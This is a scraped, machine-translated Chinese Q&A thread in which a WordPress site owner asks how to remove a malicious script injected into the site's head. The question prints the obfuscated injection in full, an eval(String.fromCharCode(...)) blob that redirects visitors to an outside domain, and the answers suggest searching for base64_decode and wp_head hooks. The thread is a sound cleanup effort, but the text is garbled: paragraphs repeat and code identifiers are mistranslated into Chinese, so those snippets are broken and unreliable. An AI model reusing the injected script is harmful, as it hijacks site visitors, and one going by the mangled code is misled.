Fatal编程技术网
  • php/
  • 如何删除header.php中找不到的恶意评估脚本

如何删除header.php中找不到的恶意评估脚本

php wordpress

如何删除header.php中找不到的恶意评估脚本,php,wordpress,eval,Php,Wordpress,Eval,我的WordPress网站已被黑客攻击,我只能通过查看我的索引页的来源来查看恶意脚本:“查看来源:mydomain.com” 问题是,我在我的任何WordPress php文件中都找不到这段代码的位置。我已经浏览了所有的核心文件(header.php、htaccess等),但没有找到它 代码位于关闭/头标记之前: <script language=javascript>eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 32, 32,

我的WordPress网站已被黑客攻击,我只能通过查看我的索引页的来源来查看恶意脚本:“查看来源:mydomain.com”

问题是,我在我的任何WordPress php文件中都找不到这段代码的位置。我已经浏览了所有的核心文件(header.php、htaccess等),但没有找到它

代码位于关闭/头标记之前:

<script language=javascript>eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 32, 32, 116, 100, 32, 61, 32, 49, 59, 32, 118, 97, 114, 32, 122, 122, 103, 32, 61, 32, 50, 59, 32, 118, 97, 114, 32, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 102, 116, 111, 117, 116, 115, 105, 100, 101, 109, 121, 112, 114, 111, 102, 105, 108, 101, 46, 105, 110, 102, 111, 47, 117, 112, 116, 121, 112, 101, 63, 122, 103, 61, 49, 38, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 99, 41, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59));</script>
块的输出也很有可能在源php文件中进行编码,因此您无法从上面找到代码片段,而是在一些wordpress文件中找到类似base64编码的字符串。就像Alexandru建议的那样,您可以在所有WP文件内容中搜索
base64\u decode
,并仔细检查发生的情况。然而,由于理论上有无数种可能如何屏蔽字符串,因此这很容易变得麻烦

另一种方法是搜索
wp\u头
hook(->搜索
'add\u动作)('wp_head'
通常用于将代码注入网站的
标题部分。可能您找到了调用的函数并负责注入上面的输出。如果您发现任何外观奇怪的代码,请将其发布到此处。
也很可能
块的输出在源php f中编码iles,因此您将无法从上面找到代码片段,而是在一些wordpress文件中找到类似base64编码的字符串。正如Alexandru所建议的,您可以在所有WP文件内容中搜索
base64\u decode
,并仔细检查发生的情况。然而,由于理论上有无限可能要屏蔽字符串,这很容易变得麻烦


另一种方法是搜索
wp\u头
hook(->搜索
'add\u动作)('wp_head'
通常用于将代码注入网站的
标题
部分。您可能会找到调用的函数并负责注入上面的输出。如果您发现任何外观奇怪的代码,请将其张贴在此处。
代码已插入WordPress选项表(sgcgoogleanalytic)。我成功地从表中删除了脚本。
代码已插入WordPress的选项表(sgcgoogleanalytic)。我成功地从表中删除了脚本。
感谢您的回复。我应该检查哪些文件?WordPress主题文件夹中的核心文件?基本上是整个WordPress设置“原样”在ftp服务器上,包括所有自定义插件和主题。根据攻击者访问您站点的方式,恶意代码可能存储在任何位置。添加了带有一些代码的注释,但不确定是否相关:添加_操作('wp_head',array(&$this,'head'),1,1);谢谢你的回复。我应该检查哪些文件?WordPress主题文件夹中的核心文件?基本上是整个WordPress设置“原样”在ftp服务器上,包括所有自定义插件和主题。根据攻击者访问您站点的方式,恶意代码可能存储在任何位置。添加了带有一些代码的注释,但不确定是否相关:添加_操作('wp_head',array(&$this,'head'),1,1);

function __construct() {

    wp_reset_query();

    $options = get_wpseo_options();

    add_action('wp_head', array(&$this, 'head'), 1, 1);
    remove_action('wp_head', 'rel_canonical');

    add_filter( 'wp_title', array(&$this, 'title'), 10, 3);
    add_filter( 'thematic_doctitle', array(&$this, 'force_wp_title') );
    add_filter( 'headway_title', array(&$this, 'force_wp_title') );

    add_action('wp',array(&$this,'page_redirect'),99,1);`